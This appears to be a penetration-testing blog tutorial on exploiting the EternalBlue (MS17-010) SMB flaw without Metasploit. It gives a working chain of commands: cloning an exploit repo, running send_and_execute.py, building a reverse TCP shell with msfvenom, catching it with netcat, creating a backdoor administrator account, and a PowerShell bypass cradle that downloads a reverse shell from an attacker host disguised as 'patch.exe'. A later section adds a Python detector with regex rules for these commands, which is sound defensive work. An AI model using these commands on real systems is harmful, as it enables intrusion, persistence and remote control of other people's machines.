
Everyone knows how to use the Metasploit exploit for EternalBlue, or MS17-010, but how do you do it without Metasploit? This is how to exploit MS17-010 without Metasploit.

The first step is to get the exploit from this GitHub repository. I'll actually use the same script to move the whoami Windows binary to the victim machine. This binary is found in /usr/share/windows-binaries.

Interested in writing a Python reverse http shell? See Learn Python By Writing A Reverse HTTP Shell In Kali Linux.

Let's get the exploit script from the GitHub repo with this command: git clone https://github.com/helviojunior/MS17-010

Send the exploit using this command: send_and_execute.py $ip reverse-shell.exe

What is reverse-shell.exe? This is the payload I created for a reverse TCP shell. Notice that the payload generation does not include Meterpreter. Create your payload with this command: msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o reverse-shell.exe

Now start a netcat listener with this command and wait for the connection: nc -lvp 443

Exploit Eternal Blue Without Metasploit

Once the payload is sent it executes on the target, so be ready to catch the reverse shell connection.

The exploit will run and send a shell back to your listener.

Windows Privilege Escalation And Persistence

Windows privilege escalation is an art as much as it is a science. Typically, if you have enough privilege you can add new users and ultimately add those users to the Administrators group.

C:\Windows\System32>net user /add evil password
net user /add evil password
The command completed successfully.
C:\Windows\System32>net localgroup administrators evil /add
net localgroup administrators evil /add
The command completed successfully.

If you wanted to try this another way, you could send the exploit to the target again once you already have a shell on the system. Since this is a kernel-level exploit, even if you are running as a low-privileged user it should escalate privileges to administrator.

Moving files from the attacker machine to the victim machine is another art. It is a practice in which ingenuity and creativity pay off, as the programs installed on the victim machine can be few and far between.

C:\Windows\System32>powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8000/reverse_shell.exe','C:\Windows\Temp\patch.exe')
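From the defender's side, the three post-exploitation commands shown above (local user creation, addition to Administrators, and a PowerShell download cradle run with execution policy bypass) are exactly what process-creation telemetry is good at catching. The following is an added example, not code from the original post: a small Python detector run over constructed process-creation records shaped like Sysmon Event ID 1 / Security event 4688. The rule names, hostnames and timestamps are my assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 style).
# The first three command lines are the ones from the post; the last is benign noise.
SAMPLE_EVENTS = [
    {"ts": "2024-01-01T10:00:00", "host": "WS01", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "net user /add evil password"},
    {"ts": "2024-01-01T10:00:05", "host": "WS01", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "net localgroup administrators evil /add"},
    {"ts": "2024-01-01T10:01:00", "host": "WS01", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": "powershell -exec bypass -c (new-object System.Net.WebClient)"
            ".DownloadFile('http://10.x.x.x:8000/reverse_shell.exe','C:\\Windows\\Temp\\patch.exe')"},
    {"ts": "2024-01-01T11:00:00", "host": "WS02", "user": "CORP\\helpdesk",
     "cmd": "net user"},
]

# Per-command rules. net1.exe and the .exe suffix are tolerated because both are common.
RULES = {
    "local_account_created":
        re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\b.*\s/add\b", re.I),
    "added_to_administrators":
        re.compile(r"\bnet(?:1)?(?:\.exe)?\s+localgroup\s+administrators\b.*\s/add\b", re.I),
    "powershell_download_cradle":
        re.compile(r"powershell.*-e(?:xec|p)?\s+bypass.*(?:WebClient|DownloadFile|DownloadString)", re.I),
}

def match_rules(cmd):
    """Return the names of every rule whose pattern matches this command line."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]

def detect(events, window=timedelta(minutes=5)):
    """Emit (host, finding, severity) tuples; raise severity when an account is
    created and then added to Administrators on the same host within `window`."""
    findings = []
    last_account_add = {}  # host -> timestamp of the most recent local account creation
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        hits = match_rules(ev["cmd"])
        for hit in hits:
            findings.append((ev["host"], hit, "medium"))
        if "local_account_created" in hits:
            last_account_add[ev["host"]] = ts
        if ("added_to_administrators" in hits and ev["host"] in last_account_add
                and ts - last_account_add[ev["host"]] <= window):
            findings.append((ev["host"], "new_local_admin_persistence", "high"))
    return findings
```

The high-severity correlation is the signal worth paging on; the individual medium hits are useful context. Note that telemetry-based detection only covers the post-exploitation stage; the vulnerability itself is addressed by applying the MS17-010 patch and disabling SMBv1.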

That's how it is done. You can exploit MS17-010, the EternalBlue vulnerability (thanks a lot, Microsoft), without using Metasploit.
